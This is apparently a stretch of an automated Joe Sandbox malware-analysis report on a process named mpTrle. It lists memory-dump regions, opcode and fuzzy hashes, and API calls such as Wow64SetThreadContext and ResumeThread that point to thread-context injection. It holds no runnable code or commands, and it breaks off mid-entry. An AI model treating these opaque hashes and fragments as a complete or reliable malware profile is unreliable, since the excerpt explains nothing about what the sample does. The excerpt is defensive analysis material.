                                                      • Opcode ID: 5e51f0a0f0e9a19bbee596ecceefdb4c1306541859e69786f0c0709b39acb830
                                                      • Instruction ID: ebf4a8d62c0a69683ac377a033fac8e743b2cd6fc580a725c606f913ce12347d
                                                      • Opcode Fuzzy Hash: 5e51f0a0f0e9a19bbee596ecceefdb4c1306541859e69786f0c0709b39acb830
                                                      • Instruction Fuzzy Hash: D341BBB4D012589FDB10DFA9D884AEEFBB1AF89314F24802AE418B7250D779A945CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1300 38f588-38f5e8 1302 38f5ea-38f5fc 1300->1302 1303 38f5ff-38f64d Wow64SetThreadContext 1300->1303 1302->1303 1305 38f64f-38f655 1303->1305 1306 38f656-38f6a2 1303->1306 1305->1306
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0038F637
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 7e436ef6fda3f503f42a00d124960660fe9b65fc6ae19579ba41c4d3b0d89f09
                                                      • Instruction ID: c8932844089825685c685d96425ea4b62e44d263bbedc22f74687ddeb084587a
                                                      • Opcode Fuzzy Hash: 7e436ef6fda3f503f42a00d124960660fe9b65fc6ae19579ba41c4d3b0d89f09
                                                      • Instruction Fuzzy Hash: 1E41ACB4D01258DFDB10DFA9D884AEEBBB1AF49314F24802AE414B7250D779A945CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1311 38ec20-38ecbc ResumeThread 1314 38ecbe-38ecc4 1311->1314 1315 38ecc5-38ed07 1311->1315 1314->1315
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0038ECA6
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 4c22db94c4e629dc6ce4dcd0fcdabbd5efc41bd339044e30467735f5158af8ab
                                                      • Instruction ID: 8162fdc04ca1dbd4dcd641b49093da6aefbd93dd8a81eadc84384617251f0367
                                                      • Opcode Fuzzy Hash: 4c22db94c4e629dc6ce4dcd0fcdabbd5efc41bd339044e30467735f5158af8ab
                                                      • Instruction Fuzzy Hash: 4B31CAB4D002189FDF10CFA9D884AEEFBB1AB89314F24842AE814B7310D735A905CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0038ECA6
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 1bbfdfe769db76fefc447e0903b5b604097b696f4df1650676eaabcdb5b7241b
                                                      • Instruction ID: 8960c78b9c6861f918fbfb467f3da96b255b863ec7bca40bd31c2e59aad1bca7
                                                      • Opcode Fuzzy Hash: 1bbfdfe769db76fefc447e0903b5b604097b696f4df1650676eaabcdb5b7241b
                                                      • Instruction Fuzzy Hash: A531D9B4D002189FDF10CFAAD884ADEFBB4AF89310F20842AE814B7300D735A901CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ^K
                                                      • API String ID: 0-554138718
                                                      • Opcode ID: ff931aaece1786092108fad36d728ff8139a751bce07885b84962d931b314448
                                                      • Instruction ID: 0f5e9df2c4dd5299258952cff58d0ad47a7818e4d0c43881159fda2deced6b52
                                                      • Opcode Fuzzy Hash: ff931aaece1786092108fad36d728ff8139a751bce07885b84962d931b314448
                                                      • Instruction Fuzzy Hash: 7A51C570E042189FDB14EFA9E984AEEBBF6EB8D300F909165E805B7354C734A946CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ^K
                                                      • API String ID: 0-554138718
                                                      • Opcode ID: 3dea3a0b3909f6d0e1120f27fa85bf803b06314a41966350938a18c0a21c064c
                                                      • Instruction ID: b0dfd56d0527bbd18b8636c275e93ab61fa834a64844c802668affc92a1100e7
                                                      • Opcode Fuzzy Hash: 3dea3a0b3909f6d0e1120f27fa85bf803b06314a41966350938a18c0a21c064c
                                                      • Instruction Fuzzy Hash: F941DF74E012189FCB00EFA9D884AEEBBB1FB8C320F509569E810B7355D735A995CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ^K
                                                      • API String ID: 0-554138718
                                                      • Opcode ID: 4f2cf68cce4d57ca9385bc6e79a7d57482ff96d3e603402d7c34ebe122ae6fdc
                                                      • Instruction ID: 7f34811b7e7640a99d55a7b3107073c3b83b077a42ee8c254e419cd30aee2dc7
                                                      • Opcode Fuzzy Hash: 4f2cf68cce4d57ca9385bc6e79a7d57482ff96d3e603402d7c34ebe122ae6fdc
                                                      • Instruction Fuzzy Hash: B2316B74E002199FDB00EF94E881AEEBBB1FF88310F508125E904BB354D770AA55CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ^K
                                                      • API String ID: 0-554138718
                                                      • Opcode ID: 7c0c4be20d2884b98e5f0bd86bd67581ada28b35faa79ac0f700b06a0b60e30d
                                                      • Instruction ID: c493d0da1cdac8a00fb927e727901b93f688301fa9f86590b36af5ba2eafb0ad
                                                      • Opcode Fuzzy Hash: 7c0c4be20d2884b98e5f0bd86bd67581ada28b35faa79ac0f700b06a0b60e30d
                                                      • Instruction Fuzzy Hash: F031B470A10508DFD758DF5AE684A5DBBF1FF8C300BA281E5D4449B769DB30AE11DB08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ^K
                                                      • API String ID: 0-554138718
                                                      • Opcode ID: 90749c7cec81ce25dff06d695c93621fc1ca63775aef88d3519ed559bf046cd8
                                                      • Instruction ID: e7f95e86eee85f004fdfea64f9dee0cbe599ef0c64584caf5bb000ad4d703cad
                                                      • Opcode Fuzzy Hash: 90749c7cec81ce25dff06d695c93621fc1ca63775aef88d3519ed559bf046cd8
                                                      • Instruction Fuzzy Hash: A611D434A00508DFC750DF99F58499DBBF0FB88310F9241E5D88497769DB30AAA1CB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3708cff61f3d8a6a139becea659024965eced40869b7eb57fd8956eb41547078
                                                      • Instruction ID: 465c493a7c792cad6fb7ffbfd541986135652d181b0013dbc7353d868c78b796
                                                      • Opcode Fuzzy Hash: 3708cff61f3d8a6a139becea659024965eced40869b7eb57fd8956eb41547078
                                                      • Instruction Fuzzy Hash: C561D474E04209CFDB18CFEAD984AEDFBB6BF89300F109129D419AB355D735A946CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e54fe671c3f9cdebc566958972745d4a0c613f88d568f5fc094d979fef8dd13
                                                      • Instruction ID: 330b3a18eaecf370e036f868c91e6f2b22f32c42d9fc6cd7af7f1f0a7a4d77ed
                                                      • Opcode Fuzzy Hash: 0e54fe671c3f9cdebc566958972745d4a0c613f88d568f5fc094d979fef8dd13
                                                      • Instruction Fuzzy Hash: 2941F574E002199FDB44DFAAD990AAEB7B2EF8C310F148569D815E7350EB31A942CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567e389cd84baa4ce82d20a191a6c8283aa8e00f5b90a54f529aa8e17fe38b2e
                                                      • Instruction ID: e0edc290e4c7c039006dd05994694994f9fe6f557bb163353fa7a3aedfa94399
                                                      • Opcode Fuzzy Hash: 567e389cd84baa4ce82d20a191a6c8283aa8e00f5b90a54f529aa8e17fe38b2e
                                                      • Instruction Fuzzy Hash: F341EE74E15218ABCB04CFAAD884AEDBBB5FF8C310F50922AD415A7701D730A956CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.448909793.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_1fd000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 822a4f47b767f3488ff492bfc427aaeb3e9338f9a703ff5981b33c5209fc8b68
                                                      • Instruction ID: fea22b30c89d3d27d4c8e9493e704a31cb0e8d2007e5218a65819153123543c6
                                                      • Opcode Fuzzy Hash: 822a4f47b767f3488ff492bfc427aaeb3e9338f9a703ff5981b33c5209fc8b68
                                                      • Instruction Fuzzy Hash: 0921C575604344DFEB14DF14E8C4B36BB66EB84314F34C669E9494B246CB36D847CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.448909793.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_1fd000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d69a25e178396ce36b2f668bd1b303d589dfdaab4868b0093b03f95a68965de
                                                      • Instruction ID: f0371f0e26e1af0b21bdcd44afb18392ec17a6bb2a2645134af6b0c2409a5eaf
                                                      • Opcode Fuzzy Hash: 6d69a25e178396ce36b2f668bd1b303d589dfdaab4868b0093b03f95a68965de
                                                      • Instruction Fuzzy Hash: B821D775604344DFEB05DF14E9C4B36BB66FB84314F34C669E9494B246C336D846CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.448909793.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_1fd000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6032b602b463b915c0ff2decf4f20dfa8dbb81ce2c16d5bb707df740245a89a
                                                      • Instruction ID: 9eb58beb874883771aaf38d94a2733b41c79f265bda32fc2c4e2167049674cc7
                                                      • Opcode Fuzzy Hash: d6032b602b463b915c0ff2decf4f20dfa8dbb81ce2c16d5bb707df740245a89a
                                                      • Instruction Fuzzy Hash: DE2180755093848FDB02CF24D994725BF71EB46314F28C5EAD8498F667C33A980ACB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ddc3ac07121ee01e2ddc27e54fef7a7390d099334b7a2580884a9229d70f43de
                                                      • Instruction ID: a4ba108ce55e6b7e2ee93d95fb9b030c90a3c77df1983f2fb184a3c0221b7175
                                                      • Opcode Fuzzy Hash: ddc3ac07121ee01e2ddc27e54fef7a7390d099334b7a2580884a9229d70f43de
                                                      • Instruction Fuzzy Hash: 402198B4E0920ADFCB64DF9AC5809BEBBF5EB88300F609155D409A7715D730AE41DB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.448909793.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_1fd000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction ID: 972886c9fddc1fe5e00b273260246c76e2123f99536cbb88dfaa02b704914337
                                                      • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction Fuzzy Hash: C411BB75504284DFDB02CF10D5C4B25BFA2FB84314F24C6AAD9494B656C33AD84ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e5120761d0580b5864ff61407dc5b4a9e0c9a12dcb3cd7ed5103efe4669812c
                                                      • Instruction ID: c74e564afbbd4a768da73368a30c75eac521de8e60e4ae3f4f5c41b613258c80
                                                      • Opcode Fuzzy Hash: 2e5120761d0580b5864ff61407dc5b4a9e0c9a12dcb3cd7ed5103efe4669812c
                                                      • Instruction Fuzzy Hash: 1D11D770E05218DFCB18CFABD8549AEBBB6BF8D301F40C569E405A7364DB30A942DB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50883ffbd9e359a49d09009599f927ee082afa261d818eaaeb151b849aa3af74
                                                      • Instruction ID: 4e33eb59ef902fbd8a67115be881d4cea3e5379326e57a0fbf43ee19c0e51a01
                                                      • Opcode Fuzzy Hash: 50883ffbd9e359a49d09009599f927ee082afa261d818eaaeb151b849aa3af74
                                                      • Instruction Fuzzy Hash: 8801FB34A45108EFD704DBA6D655AADBBF9EF4D300F1585A4D40997361DB30EE41EB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79d401800f89af920ba05f06e94e0022d120f9a591d84fbebe4f2b59f5468629
                                                      • Instruction ID: 18588b2471acc86453eaf0b284cd47fe7a4b1d6c18b281577505fcc3b497574a
                                                      • Opcode Fuzzy Hash: 79d401800f89af920ba05f06e94e0022d120f9a591d84fbebe4f2b59f5468629
                                                      • Instruction Fuzzy Hash: 4AE08C30606218EBDB00EBF199147BE77ACDB0A200F9002B5810993250EF316E109BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5347f5fa4115bff577abea665cc740321015da8c5a41c0acd409e29823a1325b
                                                      • Instruction ID: 2d13e6442502143209e40a503bc611ba0eff9cd61d53acc556e6c87a16838338
                                                      • Opcode Fuzzy Hash: 5347f5fa4115bff577abea665cc740321015da8c5a41c0acd409e29823a1325b
                                                      • Instruction Fuzzy Hash: ECE01234A45208DBCB04EFA9D95167CBB78EB8A304F2096EDC80817341DB32AE42DB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 348af3a95802e1f0331edb5ba4eb9d1036f7b682ead0cf916f421f75af0ae90b
                                                      • Instruction ID: b0e4eb0d70a9e5103e3fa19da045a2c25afbfc002f29ffa58ab2c59596fdae3a
                                                      • Opcode Fuzzy Hash: 348af3a95802e1f0331edb5ba4eb9d1036f7b682ead0cf916f421f75af0ae90b
                                                      • Instruction Fuzzy Hash: 22C04C301527448BD6352B95BD1C32C77987705356F840174D509415748F705856CA69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,/}$/}
                                                      • API String ID: 0-2913187141
                                                      • Opcode ID: 59303e3ffaaf757b938b4ad92e958ef3a2428027432ca6bbefaaa768efcf275c
                                                      • Instruction ID: efa9ff8bb0f11712456529b3a42bd900ff03edecfcbee06900cccec81553ad07
                                                      • Opcode Fuzzy Hash: 59303e3ffaaf757b938b4ad92e958ef3a2428027432ca6bbefaaa768efcf275c
                                                      • Instruction Fuzzy Hash: A6323030E106198FCB15EF75C89469DB7B6FFC9300F61C66AE409AB254EB70AD81CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b615deb42799832ab154e85f64ad3d353f5f7c9aa34b67ed0be988a820f9b8b6
                                                      • Instruction ID: 73884e145ba18681e19608c0d65637278c306bc81bd42a1383370c47f94cc586
                                                      • Opcode Fuzzy Hash: b615deb42799832ab154e85f64ad3d353f5f7c9aa34b67ed0be988a820f9b8b6
                                                      • Instruction Fuzzy Hash: ED63E831D10B1A8EDB11EF68C884699F7B1FF99300F55C79AE458B7121EB70AAD4CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7826d01e964199fad35381e6666800248b6b935a1c1dd209043cacf8435220ea
                                                      • Instruction ID: b0d6fab61fa03268a81d1d1f93d584f02f4138ad2dd4491561ea80db04d921e6
                                                      • Opcode Fuzzy Hash: 7826d01e964199fad35381e6666800248b6b935a1c1dd209043cacf8435220ea
                                                      • Instruction Fuzzy Hash: C1331B31D107198EDB11EF68C8846ADF7B1FF99300F15D79AE449AB211EB70AAC5CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /}
                                                      • API String ID: 0-3633946992
                                                      • Opcode ID: aa7d3c24be53857d931e49fc9f634ef7dfe8bce305b1858abde4788c745b3a5c
                                                      • Instruction ID: cb852618b48ad3e9738891277476901c8508a32435b2ece240ae9fbddd86bc7f
                                                      • Opcode Fuzzy Hash: aa7d3c24be53857d931e49fc9f634ef7dfe8bce305b1858abde4788c745b3a5c
                                                      • Instruction Fuzzy Hash: 8B923734A00204CFDB25DBA8C584B5DBBF2EB45314F56886AE459EB361DB35EC86CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VLl
                                                      • API String ID: 0-3496349822
                                                      • Opcode ID: b875009814f3b58aec6c49ef74a9296c9f59b3c48e294eef2de03c1c6d8711b1
                                                      • Instruction ID: b2230e45e24070d3f4c7a4382f931fa74d8e6ef892866bfc7b8277aa693105c1
                                                      • Opcode Fuzzy Hash: b875009814f3b58aec6c49ef74a9296c9f59b3c48e294eef2de03c1c6d8711b1
                                                      • Instruction Fuzzy Hash: F0916EB1E10209CFDF15CFA9C9857EEBBF2EF88314F158529E405AB290DB749945CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 892847a158c39f172a2872d06aa7fdc3c24a0a9aba3cb3bb4b7cd4ea778d439a
                                                      • Instruction ID: fc24fb0ec9a1e324a5694c609d119b3dcf691b321501347030f6fa20c8cc3b95
                                                      • Opcode Fuzzy Hash: 892847a158c39f172a2872d06aa7fdc3c24a0a9aba3cb3bb4b7cd4ea778d439a
                                                      • Instruction Fuzzy Hash: B7327F70B002088FDF14DF68D494BAEB7B6EB88311F51852AE805EB355DB39EC46CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fdb6edf51cae151208d4ab736d3a83349cc2f4d3db55f97d26fea6a761406bd
                                                      • Instruction ID: 92ceca40e57d2785793519a1dd4f812e8cf461aa3a82b48b1a8c47235348a766
                                                      • Opcode Fuzzy Hash: 2fdb6edf51cae151208d4ab736d3a83349cc2f4d3db55f97d26fea6a761406bd
                                                      • Instruction Fuzzy Hash: 24227470A006048FEF24DB68C4A47BFB7B1EB95311F648927E845DB392DA38EC49CB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed0e3c8144aa491b7a0e3669cd11c12c10ec66bd05a236bbcffac311e23a808d
                                                      • Instruction ID: b7d8eb6c85657f5d984651224b704d8dc4f78e119a804449cbc784f7e74f7cff
                                                      • Opcode Fuzzy Hash: ed0e3c8144aa491b7a0e3669cd11c12c10ec66bd05a236bbcffac311e23a808d
                                                      • Instruction Fuzzy Hash: 47B16FB0E10209CFDF15CFA9C885BDEBBF2AF89314F158529E814E7254EB749846CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4}$\}
                                                      • API String ID: 0-3794887465
                                                      • Opcode ID: 0d27106d5ba35df7a9d3ae06247dea4cfc918bcea967c12ed69654a5f3e43e7d
                                                      • Instruction ID: d115c5060051b76bd4da042e5099adb4bd43b0777285e2d81690ab62b21ac046
                                                      • Opcode Fuzzy Hash: 0d27106d5ba35df7a9d3ae06247dea4cfc918bcea967c12ed69654a5f3e43e7d
                                                      • Instruction Fuzzy Hash: 3512BD70B113058BCB15ABB8E88662D33A6FB85311F604D3AE00ADB355CF75ED579B81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: P5}$d@r
                                                      • API String ID: 0-1450692558
                                                      • Opcode ID: bd86338ae61fb7178e0bba6132972860034bd88bc0802c1fac69a69cc4faa833
                                                      • Instruction ID: 315b665cba91b2be415103de8ebedf5f07b57ee87d42c3055190d34fcfc8c1a2
                                                      • Opcode Fuzzy Hash: bd86338ae61fb7178e0bba6132972860034bd88bc0802c1fac69a69cc4faa833
                                                      • Instruction Fuzzy Hash: 70E18130E007098FDF25DFA4D4946AEBBB2EF85301F24856AE805EB355DB74AC46CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &55p
                                                      • API String ID: 0-1955183375
